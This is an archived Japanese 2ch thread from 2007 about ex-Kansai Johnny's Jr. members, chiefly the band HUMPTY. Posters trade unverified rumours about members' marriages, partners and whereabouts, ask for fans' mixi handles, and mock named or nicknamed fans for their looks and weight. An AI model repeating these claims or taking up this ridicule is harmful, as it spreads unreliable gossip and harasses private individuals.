384 :ユーは名無しネ:2007/01/15(月) 00:34:34
ガセネタではなくほんとに結婚したし 知らないのはあなただけです
信じないならそれでもいいのでは

385 :ユーは名無しネ:2007/01/16(火) 23:48:06
★超貴重!
関西Jr.サイトランキング
http://ccc.chu.jp/

386 :ユーは名無しネ:2007/01/19(金) 00:52:43
魚谷輝明
●WOWOW「猫耳少女キキ」OA
2007年1月20日(土)深夜2:00〜

387 :ユーは名無しネ:2007/01/20(土) 23:58:26
今カワズ君の検索生活にでてた
ひろ☆すけって
後藤大祐だよね?
mixiで出会った
アロマっちってコと
二人オフ会してたやつ

388 :ユーは名無しネ:2007/01/21(日) 04:59:55
HUMPTYやっとCD出るじゃん ワンマンライブあるみたいだし久しぶりに行ってどんな顔ぶれが来てるか見てこよう チケット安くなったなワラ

389 :ユーは名無しネ:2007/01/21(日) 11:50:53
久しぶりに純弥にあいたい。でもHUMPTYのライブいたいやつばっかなんやろ?かわいいファンはいないん?


390 :ユーは名無しネ:2007/01/21(日) 12:18:25
>388
ジャニヲタ特攻服隊がいる限り新規ファンはつかないよな
自分も久々に行ってみようかな

391 :ユーは名無しネ:2007/01/21(日) 13:03:38
ワンマンは見ておくべきじゃないかな〜私も久しぶりに行こうかな〜
特攻服隊は今特攻服着てないみたいだよ 彼女達は辞めないだろうし居たから何?じゃないかな

392 :ユーは名無しネ:2007/01/21(日) 15:38:06
ナゴマルの所在キボンヌ

393 :ユーは名無しネ:2007/01/25(木) 17:30:41
元関ジュで20歳で名前に「たか」ってつく人って誰?

おそらく知名度なし

394 :ユーは名無しネ:2007/01/28(日) 10:33:07
あのHUMPTY東京ワンマンおつかれ。特攻隊の活躍ぶりはどやった? はやく京都に帰ってこい。

395 :ユーは名無しネ:2007/01/28(日) 10:47:07
特効服隊増えてたw
普通に可愛い客もいたよ。少ないけどw

396 :ユーは名無しネ:2007/01/28(日) 11:15:05
特攻隊増殖中なんかぁ。その事にメンバーは喜んでいるのか?         派閥ができそうだな。

397 :ユーは名無しネ:2007/01/28(日) 11:24:38
増えた訳じゃなくいろんなグループがそれぞれ作ってるだけじゃん
すでに派閥って感じだし全員その格好ですべてのライブに出席しろよ
ワンマンだけ来てでかい態度とる奴は許さない

398 :ユーは名無しネ:2007/01/28(日) 11:44:25
最前らへんは特攻服だったよね。特攻服だから整理番号はやいの?それとも整理番号早いから特攻服なの?

399 :ユーは名無しネ:2007/01/28(日) 11:58:16
昨日行ってきた!やっぱり純弥サンかっこいいね〜。でも純弥サンの口からジャニの話題がでるとは…
本人は気にしてないんだろうね。

400 :ユーは名無しネ:2007/01/28(日) 12:21:51
>>384
マジ結婚したん?
地元同じだがそんな噂きかんし。

401 :ユーは名無しネ:2007/01/28(日) 13:07:50
前の方は特効服隊だったね。どこで作ってんだあれ。痛過ぎるw
去年はサンタの格好した奴ら見たけど

402 :ユーは名無しネ:2007/01/28(日) 13:56:07
チケット早く買えば整理番号早くなるだけで特攻服は関係ないんじゃない?ライブに来てチケット買えば早い番号になるから前で見れる それだけじゃないかな

403 :ユーは名無しネ:2007/01/28(日) 15:04:59
3月のライブ合同ってマジ?

404 :ユーは名無しネ:2007/01/28(日) 18:37:37
マジです。

405 :ユーは名無しネ:2007/01/28(日) 18:55:38
方向性が全然違うのに一緒にやる意味あるのかね

406 :ユーは名無しネ:2007/01/28(日) 19:42:18
合同って最近4人になったところと?

407 :ユーは名無しネ:2007/01/28(日) 20:21:42
純弥と北クン企画のイベントのこと?
またワンマンでいいのに。

408 :ユーは名無しネ:2007/01/28(日) 21:05:09
純弥くん大好き(*^艸^*)
今の純弥くんに詳しいひとなにか情報ください!

409 :ユーは名無しネ:2007/01/28(日) 22:00:44
>406
そう
どっちのヲタも歓迎してないような感じがするんだけど

410 :ユーは名無しネ:2007/01/28(日) 22:17:50
でもなかなかそんな機会ないしいいんじゃない?対決にはならないし…
でも特攻服見たらヒクね…

411 :ユーは名無しネ:2007/01/28(日) 22:51:01
>400
まじ

412 :ユーは名無しネ:2007/01/28(日) 23:16:43
>406
だれ?

413 :ユーは名無しネ:2007/01/28(日) 23:28:09
せらびーとやら 武ハルキらの

414 :ユーは名無しネ:2007/01/29(月) 09:11:04
アゲ♂アゲ♂

415 :ユーは名無しネ:2007/01/29(月) 13:36:59
特攻服増えてたけど色のがバラバラで変や!
白の特攻服の奴いたけど、ファンの中で一番偉いみたいな顔して、色々やってたけど何者だ?w
最近続けて行きだしたからって偉そうにするのやめれ!しかもカツーンの紙袋持ってたしなw
元祖特攻服は花を送ってたなw
プロレスラーは相変わらずデブってて醜かったよ
オバギャルと北くんのやりとりみたけど、北くんの顔がひきつってて嫌がってたから笑けたww
ダサイ玉とは北くん普通に話てたな

416 :ユーは名無しネ:2007/01/29(月) 13:45:53
花みた!
あれ元祖特攻服からなんや〜。4人組だったん?
白い特攻服はしゃしゃりすぎだろ。何者??



417 :ユーは名無しネ:2007/01/29(月) 13:53:53
元祖特攻服の奴らは何かと目立つ事をしたがる奴らだねw
オバギャルの香水は臭すぎ!
白は今度の京都にも現れるらしいぞw

418 :ユーは名無しネ:2007/01/29(月) 13:57:18
オバギャルの服は何処に売ってるのか知りたい
あんなんギャルは着ないっしょワラ
ダサイ玉とキタヤマンのあれで普通か?あれは普通って言うのではなく聞いてないだけ 嫌われてるの未だ気付いてないのか聞いてみたい プロレスラーは特攻服着たままのがデブが目立たないから着たまま帰ればいいのになワラ 白い奴大輔って書いてあったけどすごいな

419 :ユーは名無しネ:2007/01/29(月) 14:01:14
>白い奴大輔って書いてあったけど

まさか嶋大輔が現役の頃から使っているビンテージ物なのか?

420 :ユーは名無しネ:2007/01/29(月) 14:02:52
京都も来るんだ オバギャル達もツアーまわるんだろうか あれだけツアーあると大変だね

421 :ユーは名無しネ:2007/01/29(月) 14:13:56
>419
ウケるww
白い特攻服はmixiの日記までイタいからね。よくメンバーとマイミクになれるわ。

純弥のオキニの2人組もやっぱり来てたね。

422 :ユーは名無しネ:2007/01/29(月) 14:38:11
>421
純弥のオキニってだれ?どんなコ?
本気で嫉妬しちゃうわ。

423 :ユーは名無しネ:2007/01/29(月) 14:58:02
いたね(;-_-+前の方居た子達でしょ?最近よく来てるよね

424 :ユーは名無しネ:2007/01/29(月) 15:29:17
一人北山ファンの二人組の事?違うか‥

425 :ユーは名無しネ:2007/01/29(月) 17:27:25
純弥のオキニとなぜ決めつける?オキニが居たとしても純弥にしかわからないでしょ。
純弥ファンに興味なさそうだし。

426 :ユーは名無しネ:2007/01/29(月) 17:42:56
久しぶりに行ったけど高校生ファンいたから驚いたわ〜(>_<)

427 :ユーは名無しネ:2007/01/29(月) 17:50:09
そういう情報はまわってくるものなのよ。
ちなみにもう一人は他メンだよ。北くんじゃないよ。

428 :ユーは名無しネ:2007/01/29(月) 18:01:48
どの子の事だろ でもやっぱオキニとかない気がするけど ファンはファンだし

429 :ユーは名無しネ:2007/01/29(月) 18:21:19
>427
ギャル?

430 :ユーは名無しネ:2007/01/29(月) 18:25:17
>421
白の特攻服の奴ってmixiやってるの?
なんて名前の奴なん?

431 :ユーは名無しネ:2007/01/29(月) 18:39:02
勝手にオキニ決められて純弥くんたちも迷惑。ファンはファンとしか見られてないよ
自作自演バレテルよ

432 :ユーは名無しネ:2007/01/29(月) 18:57:52
白特攻服は自分がメンバーに認められてるとmixiで公言してるからねw。かなりメンバー迷惑よね。

433 :ユーは名無しネ:2007/01/29(月) 19:26:26
毎回ライブ来てるんだったら妄想でもいいんじゃない? 認めるとかって言い方がおかしいだけじゃん ライブ行く人はみんな一まとめにファンだしね

434 :ユーは名無しネ:2007/01/29(月) 20:56:53
>432
白特攻服は何をメンバーに認めてもらってるとmixiで公言してんの?w
白特攻服はなんて名前でmixiやってるんだ?

435 :ユーは名無しネ:2007/01/29(月) 21:02:25
セラビーファンならHUMPTYのCDを買うと思ってるから合同なのかな?
CDの売り上げはどーなの〜?

436 :ユーは名無しネ:2007/01/30(火) 03:19:37
何かあるとすぐ自作自演かww
私は誰がオキニとか知らないけどそんな事より合同でやる話と白特効服が気になるww

437 :ユーは名無しネ:2007/01/30(火) 08:17:50
ジャニのときも今も知名度
純弥・北クン>大堀・武藤
じゃない?

白特攻服よりオバギャルの方が顔はかわいいよね。オバギャルはいくつなの?

438 :ユーは名無しネ:2007/01/30(火) 09:20:03
昔からの仲間だしねどんな企画になるのか楽しみオバギャルひそかにしわ多いし歳かもねw
最初は純弥にサイン貰ってキャピキャピして健気だなって感じだったのに今じゃ1番態度でかいしお水だろうし手慣れた感じだね

439 :ユーは名無しネ:2007/01/30(火) 11:11:37
私が純弥クンに話しかけようとしたら前にオバギャル達がいて、うちらに『どーぞど〜ぞ』って言ってきた。お前の純弥じゃないっつーの。上から目線が腹立つ!

440 :ユーは名無しネ:2007/01/30(火) 16:24:16
ど〜ぞはないね 自分が話かけても寒いから譲ったふりしてうまくごまかしたんじゃない?w

441 :ユーは名無しネ:2007/01/30(火) 17:04:24
話し込むよりマシじゃん?

442 :ユーは名無しネ:2007/01/30(火) 19:28:45
またヲタの話か

443 :ユーは名無しネ:2007/01/30(火) 19:56:38
メンバの彼女説ないの?
純弥くんと北山くんの話ないかな?

444 :ユーは名無しネ:2007/01/30(火) 21:47:24
北クンは居そう!
純弥は居なそう!


445 :ユーは名無しネ:2007/01/30(火) 21:50:14
最近シュフとかはライブ行ってないの?
オバギャルらに潰されたかw

446 :ユーは名無しネ:2007/01/30(火) 22:20:50
HUMPTYの中で純弥以外は彼女いるよw
北山なんて同棲中だからねww
裸の奴も川崎で彼女と歩いてるし、モヒカンは京都にいて遠距離、ドラムはファンと付き合ってるでょw
チビも同棲中って聞いた

447 :ユーは名無しネ:2007/01/30(火) 22:53:23
同棲ってどっからの情報やねん してないし

448 :ユーは名無しネ:2007/01/30(火) 23:02:13
ドラムってファンと付き合ってるの!?地味だけどスキなのにー(>_<)

北クンバツ2って本当なの!?

449 :ユーは名無しネ:2007/01/30(火) 23:13:09
ヲタ話はもういい
あと北山、純弥以外のメンバーの話も要らないから
どうしても話したいなら該当板にスレ立ててやって呉

450 :ユーは名無しネ:2007/01/30(火) 23:22:34
北山はバツ1コだろ

451 :ユーは名無しネ:2007/01/30(火) 23:59:30
なんだかもうスレ違いすぎ
どっか違うとこでやってほしい

452 :ユーは名無しネ:2007/01/31(水) 00:24:17
今は知らないけど北山は女と同棲してるって聞いたよ

オバギャルmixiで純弥の地元友達にマイミクお願いしてマイミクになったってさw
しかも男の連れにしか話さないとかどこまで男好きなんだょ!
話す時に声のトーンが上がるのもどうにかならんのか?
ノコノコ京都のワンマンにも来るだろうなw

453 :ユーは名無しネ:2007/01/31(水) 00:35:38
同棲してたって誰に聞いたの?

454 :ユーは名無しネ:2007/01/31(水) 01:24:31
>452
オバギャルの仲間か?

455 :ユーは名無しネ:2007/01/31(水) 01:27:13
皆どこでそんな情報知るの?

456 :ユーは名無しネ:2007/01/31(水) 01:40:23
>454
オバギャルの仲間は影で悪口言いまくって上辺だけ仲良くしてる腹黒い奴らの集まりだからね(笑)
誰かをはみ出したら、メンバーに悪く思われるからライブでは仲良くしてる仲間だよ!
それが嫌でシュフは離れたんだからな(笑)
メンバーにあることないことをオバギャルに言われて潰されたシュフが可哀想だよ(泣)

457 :ユーは名無しネ:2007/01/31(水) 01:42:37
>455
メンバーの連れとかから聞くんだよ!w

458 :ユーは名無しネ:2007/01/31(水) 02:03:13
じゃあ全部本当の話ってこと?

459 :ユーは名無しネ:2007/01/31(水) 02:08:48
あんだけ格好いいから女の一人や二人いてもおかしくないだろ?w

460 :ユーは名無しネ:2007/01/31(水) 02:13:05
でも純弥くんには今彼女いないって書いてたけど彼女といるとこみましたよ 友達ではない感じでしたねあれは

461 :ユーは名無しネ:2007/01/31(水) 02:23:57
純弥の彼女ってよくライブに来てるよね!
今回京都にも一緒に帰ってるんじゃない?
CDジャケの女も純弥の女なんでしょ?
京都のライブに来るらしいし探さなきゃだわw

462 :ユーは名無しネ:2007/01/31(水) 07:32:04
久しぶりに回ってるなぁと思えばまたこれか
何回注意されても湧いてくる
もうこのスレなくしてもいいかも
HUMPTYのオタ話でしか回らないし

463 :ユーは名無しネ:2007/01/31(水) 09:09:05
>462
それ賛成w
ハンプティ板でもたてれば?

464 :ユーは名無しネ:2007/01/31(水) 10:20:57
>463
それ賛成!
じゃあなたがハンプティ板たててくださいw

465 :ユーは名無しネ:2007/01/31(水) 10:49:38
>463
インディーズのところにでも
あのHUMPTY板立ててください。
族だったときの話ししりたいな。

466 :ユーは名無しネ:2007/01/31(水) 11:26:48
板ってカテゴリー設立かよ

467 :ユーは名無しネ:2007/01/31(水) 11:58:26
ハンプティー板てwwww

468 :ユーは名無しネ:2007/01/31(水) 14:28:52
ではハンプティー板で会いましょうww

469 :ユーは名無しネ:2007/01/31(水) 14:51:33
>468
ハンプティ板たてたの?

470 :ユーは名無しネ:2007/01/31(水) 15:10:13
ここ面白いねぇ〜。
シュフって主婦なの!?w
オバギャルって名付けたひと天才だわww

471 :ユーは名無しネ:2007/01/31(水) 19:21:11
シュフは主婦子供いるし
純弥くんも北山くんも彼女いるでしょ いない方がさみしいじゃんw

472 :ユーは名無しネ:2007/01/31(水) 19:47:34
HUMPTYヲバって緑・ゴミ付き・芝生しかいねー

473 :ユーは名無しネ:2007/01/31(水) 23:23:31
>472
後藤大祐だまれ!
お前みたいなニートオタクに言われたくねーよ!w

474 :ユーは名無しネ:2007/01/31(水) 23:35:40
塚、緑ゴミ付き芝生って何?

475 :ユーは名無しネ:2007/01/31(水) 23:43:06
ゴピは純弥と北くんに妬いてんだろねw比べものにならないからやめてくださいね 二人のカッコよさには勝てませんよ
京都ワンマンもみなさん行きましょうね 特攻隊をまぢかで見るチャンスですよw

476 :ユーは名無しネ:2007/02/01(木) 00:16:06
今週の土曜でしたよね。ここで話題の特攻隊見たいし白い特攻服も見てみたいしなにより純弥がみたいから行こうかな。CDも買っちゃっおう。

477 :ユーは名無しネ:2007/02/01(木) 00:39:05
472は後藤じゃないし
ヲバさん宣伝活動必死過ぎて哀れ棚

478 :ユーは名無しネ:2007/02/01(木) 09:14:18
うッわ!!ハンプティー懐かしッ!!まだ野中がいた頃ライブ行ったな〜。いきなり純弥がフツーに話し掛けてきてビックリしたわwしかしいつまでバンド続けるんだろうか…

479 :ユーは名無しネ:2007/02/01(木) 10:21:21
>>400だが、>>411
昨日あいつの連れと飲んでて結婚したか聞いたらしてないって。ガセもえーとこやな

480 :ユーは名無しネ:2007/02/01(木) 15:24:52
ハンプティースレ立てるとしたら何板?
邦楽グループ板?

481 :ユーは名無しネ:2007/02/01(木) 17:14:50
インディーズじゃない?

482 :ユーは名無しネ:2007/02/01(木) 17:33:22
あのHUMPTY板あるの?

483 :ユーは名無しネ:2007/02/01(木) 19:14:08
そんな板ありません

484 :ユーは名無しネ:2007/02/01(木) 20:34:05
昔、吉野紗香とフライデーされたのって純弥クンだっけ?侯クンだっけ?

485 :ユーは名無しネ:2007/02/01(木) 20:52:43
純弥だよ

486 :ユーは名無しネ:2007/02/01(木) 21:00:29
純弥クンかぁ〜。
昔より今のほうがかっこいいよね。昔マユゲ太すぎ。

487 :ユーは名無しネ:2007/02/01(木) 22:53:04
確かにw
今ってすごく眉毛細いよね〜(・・;)

488 :ユーは名無しネ:2007/02/01(木) 22:54:49
じゃその連れが知らされてないだけで本当に結婚したしね 本人から聞いてなければ噂にしかならないからね

489 :ユーは名無しネ:2007/02/01(木) 23:25:36
今日純弥見た!
今京都にいるんだねw

490 :ユーは名無しネ:2007/02/02(金) 00:14:37
>488
本人から聞いたのか?

>489
土曜が京都ワンマンだからな

491 :ユーは名無しネ:2007/02/02(金) 00:36:12
オバギャルが可愛くみえるのは一緒にいる仲間がブサイクばかりだからw

27日のワンマン行ったら落ち武者がいてビックリしたw
よく見てみたらダサイ玉の髪が膨張してただけだったww
頭デカいのに髪が膨張してるから余計にデカくみえて笑えたwww

492 :ユーは名無しネ:2007/02/02(金) 01:59:33
落ち武者はウケル あれだけ嫌われてもまだ来てるしね 私なら辞めるな
プロレスラーの友達も純弥ファンなのによくオバギャルと友達だよね

493 :ユーは名無しネ:2007/02/02(金) 02:41:25
>491
落ち武者って言い方最高!!
あれで北山の前に現れるってある意味開き直ってるよね(笑)

>492
オバギャルはあることないこと純弥に言うから、プロレスラーの友達の純弥ファンはオバギャルを敵にすることが出来ないだけだよ(笑)

それを承知で離れたシュフは偉いな(笑)

それにしてもオバギャルの香水は臭すぎて公害だぞ!

494 :ユーは名無しネ:2007/02/02(金) 07:49:59
落ち武者ウケルw
朝から笑っちゃったww

にしても、オバギャルと落ち武者とかプロレスラーって系統違いすぎじゃなぃ!?なに繋がりで一緒にいるの?
あの3人でいたら、どーみたってオバギャルがかわいく目立つじゃん。オバギャルの戦略にみえてしょーがないw

495 :ユーは名無しネ:2007/02/02(金) 10:19:35
元々ダサイ玉にもオバギャルにもたくさん友達いたのにみんな離れて行ったからしょうがなくつるむしかなくなったんじゃん オバギャルは何が目的なんかな ダサイ玉も何がしたいのかな 嫌われてるのわかってないのかな? わかるよね普通

496 :ユーは名無しネ:2007/02/02(金) 11:15:37
ヲタの話はヨソでやれ

497 :ユーは名無しネ:2007/02/02(金) 16:52:16
>495あんたらもこのスレで嫌がられてることわからないのかな?
わかるよね、普通w

498 :ユーは名無しネ:2007/02/02(金) 17:52:19
ワンマンで箱満員に出来る程客いないのにヲタ叩きで盛り上がってるのが理解出来ない
さっさとインディーズ板に移動汁

499 :ユーは名無しネ:2007/02/02(金) 22:20:30
あのHUMPTY
http://music6.2ch.net/test/read.cgi/minor/1170422411/

500 :ユーは名無しネ:2007/02/03(土) 23:26:59
やっと立ったか…
注意しても全然人の話聞かないんだな、厨って('A`)
壷自体がおかしくなってるから仕方ないんだが…
また昔のようにマターリ話出来るといい脳
まともにがんがってる元甘受ももう少ないな


501 :ユーは名無しネ:2007/02/04(日) 11:41:38
>>488

じゃあおまいはどこからネタを仕入れたんだ
個人的にはアイツの結婚ネタはしょっちゅうとびかうから信用ゼロなわけだが。本人の友達と知り合いってやつからの書き込みもあるわけだし

502 :ユーは名無しネ:2007/02/04(日) 11:49:20
sageろボケ


503 :ユーは名無しネ:2007/02/04(日) 12:13:32
マッキーまたがんがりはじめたようだが

504 :ユーは名無しネ:2007/02/04(日) 15:23:47
本人から直接聞いたから結婚したって言ってんじゃん 結婚したからおめでとうだし そんなに否定して何がしたいの?
本人に聞いてみなよ

505 :ユーは名無しネ:2007/02/04(日) 20:56:59
>504
改行も出来ないウマシカさん
もう来なくていいよ

506 :ユーは名無しネ:2007/02/04(日) 23:09:36
>>503
あのイベはチケ100人分@一人なんで、余裕あるなら行ってやってくれ
復帰第一戦でチケ売れ残ったらカワイソス…

507 :ユーは名無しネ:2007/02/07(水) 23:53:51
いきなりすまん

V系バンドDのギタリスト・Ruizaって人が元関ジュだったらしい…
大体97年くらいに活動していたみたいです

何か情報持ってる人とかいらっしゃいますか??

508 :ユーは名無しネ:2007/02/08(木) 16:18:49
>>507
名前も違ってるだろうし、顔が分からなければ情報も何も出せませんよ

509 :ユーは名無しネ:2007/02/09(金) 20:53:31
>506>508
ハイパー止めてくれないか?

>507
その話題だいぶ前から出てるよ
今墓場見れるかシラネが見れるなら過去ログ漁ってみたら?
ついでに疑問符は全角で一つだけで十分

510 :ユーは名無しネ:2007/02/10(土) 01:41:18
あいかわらず純弥はすごい人気だな
ほとんど純弥じゃん

511 :ユーは名無しネ:2007/02/10(土) 18:56:47
純弥クンは気分屋だけど気さくだからスキー。
ライブ楽しいしね

512 :ユーは名無しネ:2007/02/11(日) 10:31:43
結婚おめでとう!!!

513 :ユーは名無しネ:2007/02/12(月) 20:34:42
瑞丸さくらん出てるんだな
どんな役かよく分からんが

514 :ユーは名無しネ:2007/02/14(水) 01:41:26
あのHUMPTYファンが移動してすっかりここの活気がなくなったな
もうすぐあっちは1000件行くぞ



515 :ユーは名無しネ:2007/02/14(水) 16:54:30
あっち凄いな
見事に厨ばっかww

516 :ユーは名無しネ:2007/02/14(水) 19:19:36
魚って六本木のお店の責任者なったらすぃね

517 :ユーは名無しネ:2007/02/14(水) 22:41:47
別にヲタ話とか元甘受以外に興味ないからレス減っても気にならない
厨も減ったし前みたいにマターリ出来そうでイイ
純弥と北山の話はこっちで禁止になった訳でもないしな

518 :ユーは名無しネ:2007/02/17(土) 15:31:32
>>507 ウィキペディアに情報ある。本名でググればわかると思う。

519 :sage:2007/02/20(火) 21:47:05
野中どこいった?
いつの間にか行方不明な気が

520 :ユーは名無しネ:2007/02/20(火) 21:49:04
スマソ
間違ってageった

521 :ユーは名無しネ:2007/02/20(火) 23:40:27
野中は来月30日のイベ来ないのかな?

522 :ユーは名無しネ:2007/02/20(火) 23:41:31
だから野中は結婚したのに信じないやつがまた書いて話おかしくなったんだよ… ひそかに暮らしてるんだよ

523 :ユーは名無しネ:2007/02/21(水) 00:24:18
>>522
結婚を信じないとかの話やなく
地元におらんからどこにおるのかて

524 :ユーは名無しネ:2007/02/21(水) 01:27:57
引越し先はわかんない

525 :ユーは名無しネ:2007/02/21(水) 18:50:49
>523結婚してるってわかってても探すんだ 
こわっ

78 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)